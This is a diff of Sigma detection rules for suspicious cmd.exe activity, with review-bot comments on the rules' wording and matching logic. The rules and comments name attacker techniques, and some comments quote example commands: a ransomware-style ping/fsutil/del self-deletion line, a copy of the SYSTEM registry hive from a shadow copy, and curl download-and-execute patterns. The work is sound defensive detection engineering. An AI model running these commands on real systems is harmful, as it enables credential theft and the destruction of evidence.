https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -15,17 +14,18 @@ logsource: category: process_creation product: windows detection: + # Example: copy \\\\\\process.dmp C:\Users\process.dmp process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - ' \\\\' - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp 
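Review bot: The added example comment `# Example: copy \\\\\\process.dmp C:\Users\process.dmp` in the copy_dmp_from_share hunk is hard to read as a UNC path: a comment is not subject to Sigma's backslash escaping, so the six backslashes look like the escaped detection value copied verbatim rather than what an operator sees on a command line. Writing it as the command actually appears, with labelled placeholders, documents the intent better: `# Example: copy \\<server>\<share>\process.dmp C:\Users\<user>\process.dmp`. The `' \\\\'` selector below it is the escaped match value and stays as is.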
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml index 820e0d875..32220433c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml @@ -1,10 +1,9 @@ title: Curl Download And Execute Combination id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288 status: test -description: Adversaries can use curl to download payloads remotely and execute them. - Curl is included by default in Windows 10 build 17063 and later. +description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. references: - - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 + - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link author: Sreeman, Nasreddine Bencherchali (Nextron Systems) date: 2020/01/13 modified: 2023/03/06 @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - 'curl ' - http diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml index 88a4668a4..2661f3542 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml 
@@ -1,18 +1,11 @@ title: File Deletion Via Del id: 379fa130-190e-4c3f-b7bc-6c8e834485f3 status: test -description: 'Detects execution of the builtin "del"/"erase" commands in order to - delete files. - +description: | + Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase 
@@ -31,21 +24,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_flags: - CommandLine|contains: - - ' /f' - - ' /s' - - ' /q' + CommandLine|contains: + - ' /f' # Force deleting of read-only files. + - ' /s' # Delete specified files from all subdirectories. + - ' /q' # Quiet mode, do not ask if ok to delete on global wildcard condition: process_creation and (all of selection_*) falsepositives: - - False positives levels will differ Depending on the environment. You can use - a combination of ParentImage and other keywords from the CommandLine field - to filter legitimate activity + - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml index 2863eb9c5..bb6cf5192 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml 
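Review bot: The reflowed `falsepositives` entry still reads `False positives levels will differ Depending on the environment`; the mid-sentence capital and the plural should be fixed while the line is being touched: `False positive levels will differ depending on the environment.` The new per-switch comments in selection_flags are useful, though `' /q'` could end with a period like the other two. Worth adding to falsepositives as well: `'del '` and `'erase '` in selection_del are unanchored substrings, so any cmd.exe line containing e.g. `model ` together with a ` /s` switch also matches, which is consistent with the rule's low level but not stated.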
@@ -1,9 +1,7 @@ title: Greedy File Deletion Using Del id: 204b17ae-4007-471b-917b-b917b315c5db status: experimental -description: Detects execution of the "del" builtin command to remove files using - greedy/wildcard expression. This is often used by malware to delete content of - folders that perhaps contains the initial malware infection or to delete evidence. +description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. references: - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -18,18 +16,20 @@ logsource: category: process_creation product: windows detection: + # Example: + # del C:\ProgramData\*.dll & exit process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_extensions: - CommandLine|contains: + CommandLine|contains: - \\\*.au3 - \\\*.dll - \\\*.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml index cb065043a..3358f6799 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml 
@@ -1,8 +1,7 @@ title: Files And Subdirectories Listing Using Dir id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 status: test -description: Detects usage of the "dir" command that is part of Windows batch/cmd - to collect information about directories +description: Detects usage of the "dir" command that is part of Windows batch/cmd to collect information about directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113 @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /s' - ' /b' diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml index bc33125ea..9f899df1a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ^^ - ^|^ - ',;,' @@ -36,6 +36,9 @@ detection: - ' s^et ' - ' s^e^t ' - ' se^t ' + # - '%%' + # - '&&' + # - '""' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml index a1b10927a..9b8e30b83 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml 
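Review bot: The three commented-out entries `# - '%%'`, `# - '&&'` and `# - '""'` appended to the dosfuscation selection carry no reason for being disabled, so a later maintainer cannot tell whether they are pending candidates or rejected ones. A one-line comment above them would settle it, e.g. `# Candidates below are disabled: <reason, e.g. false-positive rate in legitimate batch scripts> — see <issue/PR reference>`, with the placeholders filled from the upstream discussion. If they were rejected rather than deferred, removing them is cleaner than carrying dead patterns in the rule.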
@@ -1,9 +1,7 @@ title: Command Line Execution with Suspicious URL and AppData Strings id: 1ac8666b-046f-4201-8aba-1951aaec03a3 status: test -description: Detects a suspicious command line execution that includes an URL and - AppData string in the command line parameters as used by several droppers (js/vbs - > powershell) +description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) references: - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100 - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100 @@ -26,8 +24,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \cmd.exe - CommandLine|contains|all: - - http + CommandLine|contains|all: + - http # captures both http and https - :// - '%AppData%' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml index 729e3d362..641ab3266 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml 
@@ -1,10 +1,7 @@ title: Potential Privilege Escalation Using Symlink Between Osk and Cmd id: e9b61244-893f-427c-b287-3e708f321c6b status: test -description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility - on-screen keyboard binary (osk.exe) using "mklink". This technique provides an - elevated command prompt to the user from the login screen without the need to - log in. +description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md - https://ss64.com/nt/mklink.html @@ -24,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - \osk.exe - \cmd.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml index 9122b6f9f..5c73b7923 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml 
@@ -1,8 +1,7 @@ title: VolumeShadowCopy Symlink Creation Via Mklink id: 40b19fa6-d835-400c-b301-41f3a2baacaf status: stable -description: Shadow Copies storage symbolic link creation using operating systems - utilities +description: Shadow Copies storage symbolic link creation using operating systems utilities references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - HarddiskVolumeShadowCopy condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml index 4474f58a4..af8f9da1f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml @@ -1,9 +1,7 @@ title: Suspicious File Execution From Internet Hosted WebDav Share id: f0507c0f-a3a2-40f5-acc6-7f543c334993 status: test -description: Detects the execution of the "net use" command to mount a WebDAV server - and then immediately execute some content in it. As seen being used in malicious - LNK files +description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files references: - https://twitter.com/ShadowChasing1/status/1552595370961944576 - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior 
@@ -22,15 +20,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \cmd.exe - - OriginalFileName: Cmd.EXE + - Image|contains: \cmd.exe + - OriginalFileName: Cmd.EXE selection_base: - CommandLine|contains|all: + CommandLine|contains|all: - ' net use http' - '& start /b ' - \DavWWWRoot\ selection_ext: - CommandLine|contains: + CommandLine|contains: - '.exe ' - '.dll ' - '.bat ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml index d2991ab80..94451d78d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml @@ -1,12 +1,9 @@ title: Cmd.EXE Missing Space Characters Execution Anomaly id: a16980c2-0c56-4de0-9a79-17971979efdd status: test -description: 'Detects Windows command lines that miss a space before or after the - /c flag when running a command using the cmd.exe. - +description: | + Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer). - - ' references: - https://twitter.com/cyb3rops/status/1562072617552678912 - https://ss64.com/nt/cmd.html 
@@ -24,19 +21,19 @@ detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational - selection1: - CommandLine|contains: + selection1: # missing space before the /c + CommandLine|contains: - cmd.exe/c - - \cmd/c + - \cmd/c # just cmd/c would be prone to false positives - '"cmd/c' - cmd.exe/k - - \cmd/k + - \cmd/k # just cmd/k would be prone to false positives - '"cmd/k' - cmd.exe/r - - \cmd/r + - \cmd/r # just cmd/r would be prone to false positives - '"cmd/r' - selection2: - CommandLine|contains: + selection2: # special cases verified via Virustotal Enterprise search + CommandLine|contains: - /cwhoami - /cpowershell - /cschtasks @@ -47,8 +44,8 @@ detection: - /kschtasks - /kbitsadmin - /kcertutil - selection3: - CommandLine|contains: + selection3: # missing space after the /c + CommandLine|contains: - cmd.exe /c - cmd /c - cmd.exe /k @@ -56,7 +53,7 @@ detection: - cmd.exe /r - cmd /r filter_generic: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd /c ' - 'cmd.exe /k ' @@ -64,9 +61,9 @@ detection: - 'cmd.exe /r ' - 'cmd /r ' filter_fp: - - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules - - CommandLine|endswith: cmd.exe/c . - - CommandLine: cmd.exe /c + - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules + - CommandLine|endswith: cmd.exe/c . + - CommandLine: cmd.exe /c condition: process_creation and (1 of selection* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml index 5d05d7778..4b25e08a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml 
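Review bot: The new comments `# missing space before the /c` on selection1 and `# missing space after the /c` on selection3 understate the lists beneath them, which cover `/k` and `/r` as well as `/c`; suggest `# missing space before the /c, /k or /r switch` and `# missing space after the /c, /k or /r switch`. The `# special cases verified via Virustotal Enterprise search` comment on selection2 would be more useful with the verification date, since such lookups go stale. The later hunks in this section (filter_generic, filter_fp) are indentation-only.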
@@ -1,9 +1,7 @@ title: NtdllPipe Like Activity Execution id: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 status: test -description: Detects command that type the content of ntdll.dll to a different file - or a pipe in order to evade AV / EDR detection. As seen being used in the POC - NtdllPipe +description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe references: - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe author: Florian Roth (Nextron Systems) @@ -20,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - type %windir%\system32\ntdll.dll - type %systemroot%\system32\ntdll.dll - type c:\windows\system32\ntdll.dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml index 76b9f5fe0..48cd6cafe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml @@ -1,8 +1,7 @@ title: Potential CommandLine Path Traversal Via Cmd.EXE id: 087790e3-3287-436c-bccf-cbd0184a7db1 status: test -description: Detects potential path traversal attempt via cmd.exe. Could indicate - possible command/argument confusion/hijacking +description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking references: - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/ - https://twitter.com/Oddvarmoe/status/1270633613449723905 
@@ -21,23 +20,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - ParentImage|endswith: \cmd.exe - - Image|endswith: \cmd.exe - - OriginalFileName: cmd.exe + - ParentImage|endswith: \cmd.exe + - Image|endswith: \cmd.exe + - OriginalFileName: cmd.exe selection_flags: - - ParentCommandLine|contains: - - /c - - /k - - /r - - CommandLine|contains: - - /c - - /k - - /r + - ParentCommandLine|contains: + - /c + - /k + - /r + - CommandLine|contains: + - /c + - /k + - /r selection_path_traversal: - - ParentCommandLine: /../../ - - CommandLine|contains: /../../ + - ParentCommandLine: /../../ + - CommandLine|contains: /../../ filter_java: - CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java + CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Java tools are known to produce false-positive when loading libraries
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml
index 39a52866e..9876118bb 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml
@@ -1,8 +1,7 @@ title: Suspicious Ping/Copy Command Combination id: ded2b07a-d12f-4284-9b76-653e37b6c8b0 status: experimental -description: Detects uncommon one-liner command having ping and copy at the same time, - which is usually used by malware. +description: Detects uncommon one-liner command having ping and copy at the same time, which is usually used by malware. references: - Internal Research author: X__Junior (Nextron Systems)
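Review bot: In selection_path_traversal the first alternative, `- ParentCommandLine: /../../`, is an exact-value match while its sibling uses `CommandLine|contains: /../../`; as written it only fires when the parent's entire command line is literally `/../../`, which is not a realistic value, so the parent branch is effectively dead and the re-indent keeps it that way. If the intent is to catch the traversal token anywhere in the parent command line, as the rule title and description suggest, `- ParentCommandLine|contains: /../../` is presumably what was meant. The same exact-vs-contains asymmetry is worth a one-line comment if it is deliberate.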
@@ -15,18 +14,19 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: + CommandLine|contains: # Count - ' -n ' - ' /n ' - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'copy ' - ' /y ' condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml
index f5afe7bb4..c684b3edb 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml
@@ -1,9 +1,7 @@ title: Suspicious Ping/Del Command Combination id: 54786ddc-5b8a-11ed-9b6a-0242ac120002 status: test -description: Detects a method often used by ransomware. Which combines the "ping" - to wait a couple of seconds and then "del" to delete the file in question. Its - used to hide the file responsible for the initial infection for example +description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example references: - https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf
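Review bot: The new comment on `- ping # Covers "ping" and "ping.exe"` understates what the value matches: as a bare substring under `contains|all` it also hits any command line containing a word or path component such as "mapping", "shipping" or "stopping", so the only real narrowing in this rule comes from the `copy ` and ` /y ` values next to it. The comment should say so, e.g. `# Covers "ping" and "ping.exe", but also any other token containing "ping"`, so that tuners know where false positives come from. The same comment and the same value are added to selection_all of proc_creation_win_cmd_ping_del_combined_execution.yml in the next file section.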
@@ -20,24 +18,26 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 + # Example: "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\User\Desktop\lockbit\lockbit.exe" & Del /f /q "C:\Users\User\Desktop\lockbit\lockbit.exe". process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_count: - CommandLine|contains: + CommandLine|contains: - ' -n ' - ' /n ' selection_nul: - CommandLine|contains: Nul + CommandLine|contains: Nul # Covers "> Nul" and ">Nul " selection_del_param: - CommandLine|contains: + CommandLine|contains: - ' /f ' - ' -f ' - ' /q ' - ' -q ' selection_all: - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'del ' condition: process_creation and (all of selection_*) falsepositives:
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml
index 9dc02a007..49ac6ae59 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml
@@ -1,11 +1,10 @@ title: CMD Shell Output Redirect id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test -description: Detects the use of the redirection character ">" to redicrect information - in commandline +description: Detects the use of the redirection character ">" to redicrect information in commandline references: - https://ss64.com/nt/syntax-redirection.html author: frack113
@@ -23,18 +22,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|contains: '>' + CommandLine|contains: '>' filter_idm_extension: - CommandLine|contains: + CommandLine|contains: - C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe - chrome-extension:// - \\.\pipe\chrome.nativeMessaging condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Internet Download Manager extensions use named pipes and redirection via CLI. - Filter it out if you use it in your environment + - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment level: low ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
index 87f773d64..d1c24f568 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
@@ -1,13 +1,12 @@ title: Suspicious CMD Shell Output Redirect id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 related: - - id: aa2efee7-34dd-446e-8a37-40790a66efd7 - type: derived - - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a - type: similar + - id: aa2efee7-34dd-446e-8a37-40790a66efd7 + type: derived + - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a + type: similar status: experimental -description: Detects inline Windows shell commands redirecting output via the ">" - symbol to a suspicious location +description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ author: Nasreddine Bencherchali (Nextron Systems)
@@ -25,10 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious locations as you find them + # The space from the start is missing to cover append operations ">>" - '> \Users\Public\' - '> %APPDATA%\' - '> %TEMP%\'
@@ -46,16 +47,15 @@ detection: - '>C:\Users\Public\' - '>C:\Windows\Temp\' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - ' >' - '">' - - '''>' - CommandLine|contains|all: + - "'>" + CommandLine|contains|all: - C:\Users\ - \AppData\Local\ condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - - Legitimate admin or third party scripts used for diagnostic collection might - generate some false positives + - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives level: medium ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml
index 4bab2d854..30fd80791 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml
@@ -1,18 +1,11 @@ title: Directory Removal Via Rmdir id: 41ca393d-538c-408a-ac27-cf1e038be80c status: test -description: 'Detects execution of the builtin "rmdir" command in order to delete - directories. - +description: | + Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
@@ -31,12 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_rmdir: - CommandLine|contains: rmdir + CommandLine|contains: rmdir selection_flags: - CommandLine|contains: + CommandLine|contains: - /s - /q condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml
index 5e1818228..081b386e3 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml
@@ -1,8 +1,7 @@ title: Copy From VolumeShadowCopy Via Cmd.EXE id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 status: test -description: Detects the execution of the builtin "copy" command that targets a shadow - copy (sometimes used to copy registry hives that are in use) +description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
@@ -22,7 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ + # There is an additional "\" to escape the special "?" + CommandLine|contains|all: - 'copy ' - \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml
index be5789c58..8861c8cf5 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml
